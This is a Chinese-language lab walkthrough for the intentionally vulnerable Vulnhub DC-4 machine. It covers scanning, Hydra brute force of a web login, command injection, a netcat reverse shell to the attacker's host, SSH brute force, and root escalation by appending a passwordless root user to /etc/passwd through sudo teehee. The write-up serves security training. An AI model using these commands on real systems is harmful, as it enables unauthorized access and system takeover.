Vulnhub靶机DC系列-DC:4
字数 1364 2025-08-15 21:33:21
DC-4 靶机渗透测试教学文档
靶机概述
DC-4 是 Vulnhub 上设计的一个专为初学者/中级者打造的有意存在漏洞的实验室环境,旨在提供渗透测试实践经验。与之前的 DC 系列不同,DC-4 只有一个 flag,但提供多个可能的入口点,且没有任何线索提示。
关键特性:
- 需要基本的 Linux 技能和命令行熟悉度
- 需要一些基本的渗透测试工具使用经验
- 只有一个 flag,但有多重渗透路径
- 适合初学者/中级者练习
环境准备
- 下载靶机:从 Vulnhub 下载 DC-4 镜像 https://www.vulnhub.com/entry/dc-4,313/
- 虚拟机配置:使用 VMware 或 VirtualBox 导入,网络模式设置为桥接(Bridged)
- 攻击机准备:建议使用 Kali Linux 作为攻击机
渗透测试流程
1. 信息收集
获取靶机IP:
nmap -sn 192.168.3.0/24
扫描端口和服务:
nmap -sV -A -T4 <靶机IP>
2. Web应用渗透
-
访问
http://<靶机IP>发现登录页面 -
使用
dirb扫描目录:dirb http://<靶机IP>但未发现有用信息
-
暴力破解登录:
- 尝试 SQL 注入和万能密码未果
- 使用 Hydra 进行暴力破解:
hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -t 4 <靶机IP> http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F - 破解成功后进入后台
3. 获取初始访问权限
-
命令执行漏洞:
- 在后台发现可能的命令执行点
- 使用 Burp Suite 拦截请求并尝试执行命令
-
反弹shell:
- 攻击机监听:
nc -lvvp 44123 - 靶机执行:
nc -e /bin/sh <攻击机IP> 44123
- 攻击机监听:
-
改善交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'
4. 系统内部枚举
-
在
/var/www目录发现压缩包,解压后是网站备份 -
检查内核版本:
uname -a但未发现可利用的漏洞
-
在
/home目录发现用户:- jim
- sam
- charles
-
SSH爆破:
- 对 jim 账户进行爆破成功
- 使用获得的凭据登录 SSH
5. 权限提升
-
横向移动:
- 检查 jim 的邮箱 (
/var/mail/jim) - 发现包含 charles 密码的邮件:
^xHhA&hvim0y
- 检查 jim 的邮箱 (
-
切换到 charles 账户:
su charles -
检查 sudo 权限:
sudo -l发现可以使用
teehee命令 -
利用 teehee 提权:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd添加具有 root 权限的 admin 用户
-
获取 root 权限:
su admin
6. 获取 flag
在 root 目录下找到 flag 文件。
关键点总结
-
暴力破解:该靶机多次使用暴力破解技术,包括:
- Web 登录表单
- SSH 服务
-
权限提升路径:
Web登录 → 命令执行 → 反弹shell → 用户枚举 → SSH爆破 → 邮件信息泄露 → sudo提权 -
提权技巧:
- 利用
teehee命令写入/etc/passwd文件 - 添加具有 root 权限的新用户
- 利用
学习要点
-
暴力破解的实践:
- 选择合适的字典
- 使用 Hydra 等工具进行高效爆破
- 处理爆破时间过长的问题
-
信息收集的重要性:
- 系统内部文件检查(如邮件)
- 用户目录和文件权限检查
-
权限提升方法:
- 检查 sudo 权限
- 利用可写文件进行提权
-
横向移动技巧:
- 通过系统内部信息获取其他用户凭据
- 利用获得的凭据进行账户切换
改进建议
- 爆破时可尝试更精准的字典
- 可尝试其他 Web 漏洞如 XSS、CSRF 等
- 检查更多可能的提权路径,如 SUID 文件、cron 任务等
- 尝试使用 Metasploit 框架自动化部分流程
通过本靶机的练习,可以掌握基本的渗透测试流程、暴力破解技术和多种权限提升方法。